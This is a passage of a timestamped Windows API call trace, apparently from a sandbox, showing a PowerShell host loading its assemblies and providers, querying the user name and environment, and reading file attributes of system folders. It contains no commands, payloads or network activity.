	[0429.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.178] CoTaskMemAlloc (cb=0x804) returned 0x1b35c010
	[0430.178] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b35c010, nSize=0x18d908 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x18d908) returned 0x1
	[0430.178] CoTaskMemFree (pv=0x1b35c010) 
	[0430.178] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0430.178] GetUserNameW (in: lpBuffer=0x22c760, pcbBuffer=0x18d948 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18d948) returned 1
	[0430.178] CoTaskMemFree (pv=0x22c760) 
	[0430.179] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e65e98*="Registry", lpRawData=0x2e65c28) returned 1
	[0430.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.270] CoTaskMemAlloc (cb=0x804) returned 0x1b35c010
	[0430.270] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b35c010, nSize=0x18d908 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x18d908) returned 0x1
	[0430.270] CoTaskMemFree (pv=0x1b35c010) 
	[0430.270] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0430.270] GetUserNameW (in: lpBuffer=0x22c760, pcbBuffer=0x18d948 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18d948) returned 1
	[0430.271] CoTaskMemFree (pv=0x22c760) 
	[0430.271] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e6b2b0*="Variable", lpRawData=0x2e6b040) returned 1
	[0430.273] CoTaskMemAlloc (cb=0x104) returned 0x290510
	[0430.273] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0430.273] CoTaskMemFree (pv=0x290510) 
	[0430.276] CoTaskMemAlloc (cb=0x104) returned 0x290510
	[0430.276] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0430.276] CoTaskMemFree (pv=0x290510) 
	[0430.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x18d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0430.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x18d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0430.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x18d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0430.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x18d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0430.416] CoTaskMemAlloc (cb=0x804) returned 0x1b35c010
	[0430.416] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b35c010, nSize=0x18d908 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x18d908) returned 0x1
	[0430.416] CoTaskMemFree (pv=0x1b35c010) 
	[0430.416] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0430.416] GetUserNameW (in: lpBuffer=0x22c760, pcbBuffer=0x18d948 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18d948) returned 1
	[0430.416] CoTaskMemFree (pv=0x22c760) 
	[0430.417] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e7eec8*="Certificate", lpRawData=0x2e7ec58) returned 1
	[0430.533] CoTaskMemAlloc (cb=0x104) returned 0x290510
	[0430.533] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0430.533] CoTaskMemFree (pv=0x290510) 
	[0430.536] GetLogicalDrives () returned 0x4
	[0430.536] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x18d590, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0430.536] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0430.537] CoTaskMemAlloc (cb=0x20e) returned 0x28e220
	[0430.537] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x28e220 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0430.538] CoTaskMemFree (pv=0x28e220) 
	[0430.539] CoTaskMemAlloc (cb=0x104) returned 0x290510
	[0430.539] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0430.539] CoTaskMemFree (pv=0x290510) 
	[0430.539] CoTaskMemAlloc (cb=0x104) returned 0x290510
	[0430.539] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0430.539] CoTaskMemFree (pv=0x290510) 
	[0430.556] CoTaskMemAlloc (cb=0x104) returned 0x290510
	[0430.556] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0430.556] CoTaskMemFree (pv=0x290510) 
	[0430.558] CoTaskMemAlloc (cb=0x104) returned 0x290510
	[0430.559] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0430.559] CoTaskMemFree (pv=0x290510) 
	[0430.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0430.559] SetErrorMode (uMode=0x1) returned 0x1
	[0430.559] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x18d550 | out: lpFileInformation=0x18d550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0430.559] SetErrorMode (uMode=0x1) returned 0x1
	[0430.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0430.559] SetErrorMode (uMode=0x1) returned 0x1
	[0430.559] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x18d550 | out: lpFileInformation=0x18d550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0430.559] SetErrorMode (uMode=0x1) returned 0x1
	[0430.560] CoTaskMemAlloc (cb=0x104) returned 0x290510
	[0430.560] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0430.560] CoTaskMemFree (pv=0x290510) 
	[0430.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0430.560] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x18d300, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0430.560] SetErrorMode (uMode=0x1) returned 0x1
	[0430.561] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x18d510 | out: lpFileInformation=0x18d510*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0430.561] SetErrorMode (uMode=0x1) returned 0x1
	[0430.561] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x18d300, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0430.561] SetErrorMode (uMode=0x1) returned 0x1
	[0430.561] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x18d510 | out: lpFileInformation=0x18d510*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0430.561] SetErrorMode (uMode=0x1) returned 0x1
	[0430.561] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x18d310, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0430.561] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x18d200, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0430.561] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x18d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0430.561] SetErrorMode (uMode=0x1) returned 0x1
	[0430.561] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x18d510 | out: lpFileInformation=0x18d510*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0430.562] SetErrorMode (uMode=0x1) returned 0x1
	[0430.562] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x18d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0430.562] SetErrorMode (uMode=0x1) returned 0x1
	[0430.562] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x18d510 | out: lpFileInformation=0x18d510*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0430.562] SetErrorMode (uMode=0x1) returned 0x1
	[0430.562] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x18d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0430.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x18d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0430.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0430.562] SetErrorMode (uMode=0x1) returned 0x1
	[0430.562] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x18d510 | out: lpFileInformation=0x18d510*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0430.562] SetErrorMode (uMode=0x1) returned 0x1
	[0430.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0430.563] SetErrorMode (uMode=0x1) returned 0x1
	[0430.563] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x18d510 | out: lpFileInformation=0x18d510*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0430.563] SetErrorMode (uMode=0x1) returned 0x1
	[0430.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0430.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x18d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0430.563] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x18d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0430.563] SetErrorMode (uMode=0x1) returned 0x1
	[0430.564] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x18d550 | out: lpFileInformation=0x18d550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0430.564] SetErrorMode (uMode=0x1) returned 0x1
	[0430.564] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x18d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0430.564] SetErrorMode (uMode=0x1) returned 0x1
	[0430.564] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x18d550 | out: lpFileInformation=0x18d550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0430.564] SetErrorMode (uMode=0x1) returned 0x1
	[0430.564] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x18d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0430.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x18d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0430.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0430.564] SetErrorMode (uMode=0x1) returned 0x1
	[0430.564] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x18d550 | out: lpFileInformation=0x18d550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0430.565] SetErrorMode (uMode=0x1) returned 0x1
	[0430.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0430.565] SetErrorMode (uMode=0x1) returned 0x1
	[0430.565] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x18d550 | out: lpFileInformation=0x18d550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0430.565] SetErrorMode (uMode=0x1) returned 0x1
	[0430.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0430.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x18d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0430.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0430.566] SetErrorMode (uMode=0x1) returned 0x1
	[0430.566] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x18d810 | out: lpFileInformation=0x18d810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0430.566] SetErrorMode (uMode=0x1) returned 0x1
	[0430.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.677] CoTaskMemAlloc (cb=0x804) returned 0x1b35c010
	[0430.677] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b35c010, nSize=0x18db78 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x18db78) returned 0x1
	[0430.678] CoTaskMemFree (pv=0x1b35c010) 
	[0430.678] CoTaskMemAlloc (cb=0x204) returned 0x22c760
	[0430.678] GetUserNameW (in: lpBuffer=0x22c760, pcbBuffer=0x18dbb8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18dbb8) returned 1
	[0430.678] CoTaskMemFree (pv=0x22c760) 
	[0430.680] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2eb7bb0*="Available", lpRawData=0x2eb7940) returned 1
	[0430.767] CoTaskMemAlloc (cb=0x104) returned 0x290510
	[0430.767] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0430.767] CoTaskMemFree (pv=0x290510) 
	[0430.768] CoTaskMemAlloc (cb=0x104) returned 0x290510
	[0430.769] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0430.769] CoTaskMemFree (pv=0x290510) 
	[0430.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
